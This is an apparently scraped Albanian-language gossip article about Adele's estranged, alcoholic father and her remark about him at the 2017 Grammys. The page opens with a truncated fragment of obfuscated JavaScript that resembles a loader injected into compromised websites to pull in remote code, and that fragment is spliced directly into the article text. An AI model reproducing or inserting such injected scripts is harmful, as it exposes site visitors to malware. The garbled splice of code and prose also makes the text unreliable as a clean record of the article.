;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Adele dikur kishte pranuar se ajo nuk e do babanë e saj

By

Gjatë fjalimit të saj të pranimit në Grammy Awards 2017, duke fituar çmimin “Kënga e vitit” me “Hello”, Adele shokoi fansat duke thënë se nuk e do babanë e saj. Këngëtarja i tha menaxheri të saj,  Jonathan Dickins:

“Ju kam borxh gjithçka. Ne kemi qenë së bashku për dhjetë vjet, dhe unë ju dua si të ishit babai im. Unë nuk e dua babain tim, kjo është gjëja, kështu që nuk do të thotë shumë, por unë të dua ashtu si do ta doja babanë tim!”

Adele ishte vetëm tre vjeçare kur babai i saj, Mark Evans, braktisi atë dhe nënën e saj – e për më tepër ai vuante edhe nga varësia e alkoolit, njofton Insajderi.

Adele's dad Mark Evans begs for forgiveness and fears he will never see his  grandchild - Mirror Online

Evans nuk e mohoi që ai ishte “një baba i tmerrshëm në një kohë kur ajo me të vërtetë kishte nevojë për mua”. Ai iu drejtua alkoolit çdo ditë, pas vdekjes së babait të tij për shkak të kancerit të zorrëve dhe e dinte që ai nuk dëshironte që Adele ta shihte atë në atë mënyrë.

Adele u rrit në Londër me nënën e saj, Penny Adkins dhe kaloi pushimet verore me babanë e saj në Uellsin e Jugut; megjithatë, alkoolizmi i tij i mbajti larg.

Evans pranoi se ai nuk ishte stabil për të ndihmuar financiarisht vajzën e tij teksa ajo rritej, dhe mungoi në shumë raste speciale të saj.

Babai i këngëtares së famshme u përpoq të rregullonte marrëdhënien me vajzën e tij kur ajo mbushi 15 vjet, dhe gjërat shkuan mirë për një kohë.

Mirëpo ai bëri një gabim, kur foli për disa media për marrëdhënien e tyre të komplikuar kur Adele arriti pikun e famës.

Një gjë e tillë kishte acaruar tejmase Adele, e cila më pas vendosi të shkëpusë çdo kontakt me babanë e saj.

Evans nuk ndjeu asgjë tjetër përveç gëzimit kur mësoi për herë të parë për shtatzëninë e Adele nga nëna e saj. Në atë kohë, lumturia e tij u shndërrua në trishtim sepse vajza e tij nuk i tha vetë.

Ai e kuptoi që Adele nuk e konsideronte atë si dikush aq të rëndësishëm sa për t’i treguar një lajm kaq të madh.

Adele's dad spotted working as a delivery driver for Yodel - Wales Online

Artikuj të ngjashëm